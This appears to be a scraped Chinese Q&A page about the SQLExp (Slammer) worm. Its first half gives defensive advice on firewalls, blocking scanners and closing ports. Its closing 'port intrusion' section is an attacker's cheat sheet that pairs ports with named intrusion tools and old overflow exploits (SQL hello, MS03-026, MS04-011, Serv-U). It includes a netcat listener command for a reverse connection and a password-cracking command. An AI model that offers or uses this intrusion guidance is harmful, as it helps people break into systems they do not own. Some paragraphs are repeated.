本文目录一览：

• 1、电脑受到sqlexp攻击怎么办？
• 2、已用360安全卫士下载并安装了全部漏洞补丁为什么还受到SQLExp的攻击
• 3、SQLExp是什么文件,为什么黑客老攻击它如题 谢谢了
• 4、遭到SQLexp 攻击了，怎么办
• 5、怎么解决SQLexp被攻击？

电脑受到sqlexp攻击怎么办？

有人在局域网内开扫描器扫描大范围扫描。

这个已经被防火墙拦截了，你可以无视他，觉得障眼也可以取消警告提示。个人计算机没什么大的问题，可能是黑客攻击一扫而过，如果是服务器你就要注意了。

解决办法：在局域网内，揪出恶意扫描人。在公网的话，你可以屏蔽该IP或IP段。

已用360安全卫士下载并安装了全部漏洞补丁为什么还受到SQLExp的攻击

这个是你的端口被开启了，它会相应黑客端口的探查，从而攻击你，你使用windows自带的防火墙打开，这样你的电脑端口自动隐藏，黑客也就探查不到你的端口了.你可以在开启防火墙后去的赛门铁克的在线安全检测端口是否还是暴露.

SQLExp是什么文件,为什么黑客老攻击它如题 谢谢了

“蠕虫王”是一个极为罕见且极其短小的蠕虫病毒，英文名为Worm.SQLexp.376，主要通过 Microsoft SQL Server的漏洞发动攻击，极具破坏力。 蠕虫王蠕虫病毒仅在内存中传播，没有文件载体，其长度仅有376字节。但其传播速度 极快，且使用广播数据包方式发送自身代码，每次均攻击子网中所有可能存在机器。易受 “蠕虫王”攻击的机器类型为所有安装有Microsoft SQL Server 2000并且没有修补漏洞的 NT系列服务器，包括WinNT/Win2000/WinXP等，不会感染Win9X系统。由于蠕虫王并不对是 否已经侵入系统作判定，所以其不停的入侵将会造成拒绝服务式攻击，从而导致被攻击机 器因瘫痪而停止服务，危害极为惊人。

遭到SQLexp 攻击了，怎么办

SQLExp.Worm，病毒体极其短小,却具有极强的传播性，它利用Microsoft SQL Server的漏洞

进行传播,由于Microsoft SQL Server在世界范围内都很普及，因此此 ... 请在线升级您的

金山毒霸，即可查杀该病毒！

有人在局域网内开扫描器扫描大范围扫描。

这个已经被防火墙拦截了，你可以无视他，觉得障眼也可以取消警告提示。个人计算机没什么大的问题，可能是黑客攻击一扫而过，如果是服务器你就要注意了。

解决办法：在局域网内，揪出恶意扫描人。在公网的话，你可以屏蔽该IP或IP段。

怎么解决SQLexp被攻击？

只开放必要的端口，关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放，

黑客就会利用扫描工具扫描那些端口可以利用，这对安全是一个严重威胁。

端口 协议 应用程序

　 21 TCP FTP

　 25 TCP SMTP

　 53 TCP DNS

　 80 TCP HTTP SERVER

　 1433 TCP SQL SERVER

　 5631 TCP PCANYWHERE

　 5632 UDP PCANYWHERE

　 6（非端口） IP协议

　 8（非端口） IP协议

将下面的端口关闭

TCP

　 21

　 22

　 23

　 25 TCP SMTP

　 53 TCP DNS

　 80

　 135 epmap

　 138 [冲击波]

　 139 smb

　 445

　 1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b

　 1026 DCE/12345778-1234-abcd-ef00-0123456789ac

　 1433 TCP SQL SERVER

　 5631 TCP PCANYWHERE

　 5632 UDP PCANYWHERE

　 3389

　 4444[冲击波]

　 4489

　 UDP

　 67[冲击波]

　 137 netbios-ns

　 161 An SNMP Agent is running/ Default community names of the SNMP Agent

端口入侵：

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破（字典是关键）

最后 SQLTools.exe入侵

=============================

对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

（以上反向的，测试成功）

sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵

用4899过滤器.exe，扫描空口令的机器

3. 3899的入侵

对很早的机器，可以试试3389的溢出(win3389ex.exe)

对2000的机器，可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器，可以用webdav入侵；

对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）

可以利用SQL进行注入。（小榕的注入软件）。

5. serv-u入侵(21端口）

对5. 004及以下系统，可用溢出入侵。（serv5004.exe）

对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

======================================

对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）

输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵

利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。